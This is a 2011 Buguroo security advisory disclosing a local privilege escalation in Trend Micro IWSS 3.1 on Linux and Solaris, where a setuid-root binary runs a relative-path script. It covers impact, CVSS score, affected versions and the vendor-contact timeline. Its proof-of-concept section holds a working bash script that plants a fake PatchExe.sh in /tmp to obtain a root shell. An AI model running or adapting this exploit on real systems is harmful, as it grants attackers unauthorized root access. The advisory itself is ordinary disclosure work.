Trendmicro IWSS 3.1 Privilege Escalation

` #############################  
# BUGUROO SECURITY ADVISORY #  
#############################  
  
[ ADVISORY ]  
  
Title: Trendmicro IWSS 3.1 privilege escalation  
Product: InterScan Web Security Suite (IWSS)  
Vendor: TrendMicro  
Advisory ID: BSA-2011-002  
Advisory URL: http://buguroo.com/adv/BSA-2011-002.txt  
Date published: 25/10/2011  
  
  
[ DISCLAIMER ]  
  
Buguroo Offensive Security, S.L. assumes no liability for the use of  
the information provided in this advisory. This advisory was released  
in an effort to help the I.T. community protect themselves against a  
potentially dangerous security hole. This advisory is not an attempt  
to solicit business.  
  
  
[ INFORMATION ]  
  
Impact: Privilege escalation  
Remotely: No  
Locally: Yes  
CVSS: 8.1  
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:F/RL:U/RC:UR/CDP:H/TD:ND/CR:H/IR:H/AR:H)  
CVE: Not assigned yet.  
  
  
[ DESCRIPTION ]  
  
A vulnerability was found in the software IWSS of TrendMicro that  
could allow an attacker to gain root access in the system.  
  
The binary "patchCmd" has sticky permissions for the "setuid" and  
"setgid" with the user root. The execution is allowed to all  
users.  
  
The code performs a setuid(0) before an a system() by that the  
execution will take root permissions regardless of user permissions.  
  
system() calls two scripts:  
"./PatchExe.sh" and "./RollbackExe.sh" depending the input parameters  
of "patchCmd".  
  
As you can see the string "./" Indicates the execution in the  
current directory, you can easily create new scripts in another  
PATH and force the execution on it.  
  
  
[ VULNERABLE PRODUCTS ]  
  
* IWSS <= 3.1 (linux)  
* IWSS <= 3.1 (solaris)  
  
  
[ WORKAROUNDS ]  
  
None at this moment.  
  
  
[ PROOF OF CONCEPT ]  
  
To exploit this vulnerability as a proof of concept we create a  
script in the PATH of a user without privileges who simply open  
a new setuid(0) Bourne Shell.  
  
The binary is executed with the appropriate input to compose  
the execution parameters and then scale privileges.  
  
--------------------------------------------------------------------  
#!/bin/bash  
# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com  
  
cd /tmp  
echo "[*] Creating shell file"  
echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh  
echo "[*] Change permissions"  
chmod 755 PatchExe.sh  
echo "[*] Got r00t... Its free!"  
/opt/trend/iwss/data/patch/bin/patchCmd u root  
--------------------------------------------------------------------  
  
  
[ TIMELINE ]  
  
26/06/2011 - Vulnerability was identified  
28/06/2011 - Vendor contacted multiple times:  
* SR2-1-547365091  
* SR2-1-547365101  
* SR2-1-547374771  
* SR2-1-547378291  
03/08/2011 - We send more documents to TrendMicro.  
25/10/2011 - Due to the lack of response from TrendMicro we  
publish this vulnerability.  
  
  
[ ACKNOWLEDGMENTS ]  
  
This vulnerability was discovered and researched by:  
- Jose Ramon Villa <jrvilla.AT.buguroo.com>  
  
  
[ REFERENCES ]  
  
* http://blog.buguroo.com  
* http://www.buguroo.com  
  
  
[ ABOUT BUGUROO ]  
  
Buguroo is a Spanish offensive security company founded in 2007  
exclusively dedicated to the development of IT security solutions.  
We are a 100% R+D company under continuous evolution and  
technological renovation, enabling us to stay at the vanguard of  
our sector and to offer a first class service world wile.  
  
  
[ LICENSE ]  
  
The contents of this advisory are copyright (c) 2011 Buguroo  
Offensive Security S.L. are licensed under a Creative Commons  
Attribution Non-Commercial Share-Alike 3.0 (International)  
  
License: http://creativecommons.org/licenses/by-nc-sa/3.0/  
  
# EOF  
`